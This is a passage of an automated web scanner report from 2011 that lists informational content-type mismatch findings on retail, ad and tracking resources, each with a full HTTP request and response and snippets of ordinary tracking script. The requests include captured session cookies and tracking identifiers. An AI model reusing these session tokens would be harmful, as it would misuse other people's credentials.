Set-Cookie: evo5=csmq4atf04cxa%7CKz%2FsqEZUicFPMyEDsXHH1MSW%2BZI3Y4yZsY2TZYK0lme6J0%2F%2F5cJj4i5QIpKwPczgJZAQNrXz2j7XZmq5jtawoEWziapdMaIEeagfIatlF5XjqUVYDeuzym%2B3L3DvzwFZqAGftusSA7%2FH6h5uOHqAdek3yS%2FDEnd5IaL9HCki%2Fj3OLpZ2oegNjDsnPLpvDUDbbzrGpO3yDBMmQflpaJVA5e04Awv4pjXY7ie%2Fsgk76QC984EszuNAmIlWrEv8DXkUuTmTPdLwjxFAwx2HAQguuI%2BSgSjDfAORVbob%2BBB%2By9vd0hGWqn%2Bo75V1p6N%2BXuyc62lXVjgoCXBaYN4jtjvlc8q63gOwLcZhjBJYJIooWQL%2BKfA0YSh2JVSRn95lYitY%2FHBfCzrA1FHVZBtBPy5fwTqgZvNgXSnyElnAyt%2F9gI1R4SXed7OZN8I2IfPH1MoaWsEEPd7tIYwWhCfzLvR%2FC1bDICQV8%2F91PU0i6SZ%2FMNPTfOIDgKVxE6PEOxcd7hsvAImGEECynTh9E0Px5eHg2W13MvQNn8pgmxbwiBg2Qxw%3D; expires=Tue, 15-Nov-2011 10:33:12 GMT; path=/; domain=.netmng.com
Content-Length: 748
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://beacon.afy11.net/ad?mode=4&ac=0&av=9990862&rand=899967993'; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.body.appendChild(i);
...[SNIP]...

26.16. http://ace.imageg.net/graphics/product_images/pACE3-4403835th.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ace.imageg.net
Path:   /graphics/product_images/pACE3-4403835th.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /graphics/product_images/pACE3-4403835th.jpg HTTP/1.1
Host: ace.imageg.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/category/index.jsp?categoryId=2568444&clickid=topnav_lawn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: TUX/2.0 (Linux)
Content-Type: image/jpeg
Content-Length: 3265
ETag: "3265-ehifeign"
Accept-Ranges: bytes
Last-Modified: Wed, 09 Jan 2008 22:19:25 GMT
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:47:27 GMT
Connection: close

......JFIF.....H.H.....C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......P.P.................................
...[SNIP]...

26.17. http://action.media6degrees.com/orbserv/hbjs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT


(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';

26.18. http://app.gnc.com/profile/javascript/utils.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://app.gnc.com
Path:   /profile/javascript/utils.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /profile/javascript/utils.js HTTP/1.1
Host: app.gnc.com
Proxy-Connection: keep-alive
Referer: http://app.gnc.com/profile/profile.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:11 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2004 11:20:50 GMT
ETag: "f7acb-b49-3e7e4b7a90880"
Accept-Ranges: bytes
Content-Length: 2889
Content-Type: application/x-javascript


REGEX_NON_ASCII = new RegExp("[^\\x00-\\x7F]");
REGEX_EMAIL = new RegExp("^([^()<>@,;:\\\\\".\\s\\x00-\\x1F\\x7F\\[\\]]+|\"([^\\\\\"\\x0D]|\\\\.)*\")(\\.([^()<>@,;:\\\\\".\\s\\x00-\\x1F\\x7F\\[
...[SNIP]...

26.19. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=97454&rnd=513812.7808459103 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jtvLaMz402WG00001jFD.aMPi0cOm00001iGbIaMPo0cFA00001idcDaMPm0cEt00001iEDtaMQF06b+00001iuIZaMPl0aMI00001iETRaMPm06b+00001jxYPaMPg0doZ00001idcEaMPm0cEt00001iN4OaMPo0d9d00000; B3=9xx40000000001uD8Yi+0000000001uD98IM0000000000uD9sKa0000000001uD8SlF0000000001uD8SlE0000000001uD8VS90000000001uD9fOJ0000000001uC8JJn0000000001uD8VSD0000000001uD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:54:08 GMT
Connection: close
Content-Length: 267

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://segment-pixel.invitemedia.com/pixel?pixelID=2083&partnerID=31&clientID=1027&key=segment';
ebReportingImg1 = new Image();
ebReportingImg1.sr
...[SNIP]...

26.20. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...

26.21. http://eval.bizrate.com/js/survey_126457_1.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://eval.bizrate.com
Path:   /js/survey_126457_1.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/survey_126457_1.js HTTP/1.1
Host: eval.bizrate.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=720232510841276994; br=13055101949906417201602020302001211; _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 16 May 2011 01:54:04 GMT
Content-Length: 16130

<!-- // hide script
var BIZRATE = {
init:function() {
this.mid = '126457';
this.type = 1;
if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) {

...[SNIP]...

26.22. http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipinvite.iperceptions.com
Path:   /Invitations/Javascripts/ip_Layer_Invitation_903.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /Invitations/Javascripts/ip_Layer_Invitation_903.aspx HTTP/1.1
Host: ipinvite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Mon, 16 May 2011 01:52:36 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-by: INVSVR11
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 351

var _http = document.location.protocol;var gLink = _http +'//ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.js';var script = document.createElement('script'); script.setA
...[SNIP]...

26.23. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

26.24. http://px.steelhousemedia.com/pr

Summary

Severity:   Information
Confidence:   Firm
Host:   http://px.steelhousemedia.com
Path:   /pr

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /pr?get_px=1&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachE
...[SNIP]...

26.25. http://rya.rockyou.com/ams/ptrck.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rya.rockyou.com
Path:   /ams/ptrck.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ams/ptrck.php?code=td9d4f46 HTTP/1.1
Host: rya.rockyou.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.3
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Set-Cookie: _uix=1e332431789352e278724a20ce3eae2f33216d6dfd8aae4ea32b9e5902c2eede; expires=Sat, 12-Nov-2011 02:01:38 GMT; path=/; domain=rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www236.rockyou.com took D=10868 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 125


<!-- Active server list retrived from APC Store -->
<!-- Using Ad Server http://10.130.8.33:8080/adserver/pixel -->
26.26. http://s.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /meta?_o=16993&_t=cm HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-1970 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1315892-B1315899=0|0|0|0|0|1315897|1315896|-1; domain=.ru4.com; path=/
Set-cookie: O16993=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Set-cookie: C1315892=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Content-type: text/html
Content-length: 20992
Connection: close

_cm_registerCallback(1105, function (data) {

//v3.7.18

var xptid = "";
var xpsid = "";
var xpcost = "";
var xpcg = "";
var xpordernum = "";
var xprand = 0; //tes
...[SNIP]...

26.27. http://sales.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=1402662 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159; ASPSESSIONIDSQBBBCQB=AJBFJLFBKKLLCEBDLJEAJLLC

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=1402662
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1483"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:03:02 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.28. https://secure.bhphotovideo.com/images/!crd_prm!.!cm

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /images/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /images/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=569969&crd_cnt=0.01&crd_tpb=1305541063955&crd_olt=0 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/tryagainlater.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937; TS20403f=8a761c2c8821a78158429f233f763ae4122d42923efb3af94dd0f9c1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 03:58:49 GMT
ETag: "42-4d5c9cf9"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:17:46 GMT
Connection: keep-alive
Content-Length: 66

BMB.......>...(...................................................

26.29. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.orientaltrading.com
Path:   /uiframework/skins/default/js/shoppingCart.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /uiframework/skins/default/js/shoppingCart.js HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: https://secure.orientaltrading.com/ui/userProfile/processRequest.do?requestURI=displayLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; JSESSIONID=sz7tNQ5LLchTqrzz9nrtfknpW1ThvbLMlF1vJ5vfMB2Wpdk8p0s4!-2120161015; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305541001747}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:54 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 10650
Last-Modified: Fri, 06 May 2011 14:08:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html

var errorCounter = 0;
var gcErrorMsg = false;
var nextElement;

function getProductDetails(requestURI, productId, sku)
{
document[lookupIdByTagId("frmCategoryLevels")][lookupIdByTagId("reque
...[SNIP]...

26.30. http://shop.pacsun.com/js/widget-qv-uc.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://shop.pacsun.com
Path:   /js/widget-qv-uc.jsp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /js/widget-qv-uc.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:54:21 GMT
Connection: close
Content-Length: 6093


/* QuickView Javascript */
/* ---------------------------------------- */

//quickViewcommands[0] = "show" action
//quickViewcommands[1] = "add product" action
var quickViewCommands = new Array(2);

...[SNIP]...

26.31. http://sr2.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=53965383 HTTP/1.1
Host: sr2.liveperson.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
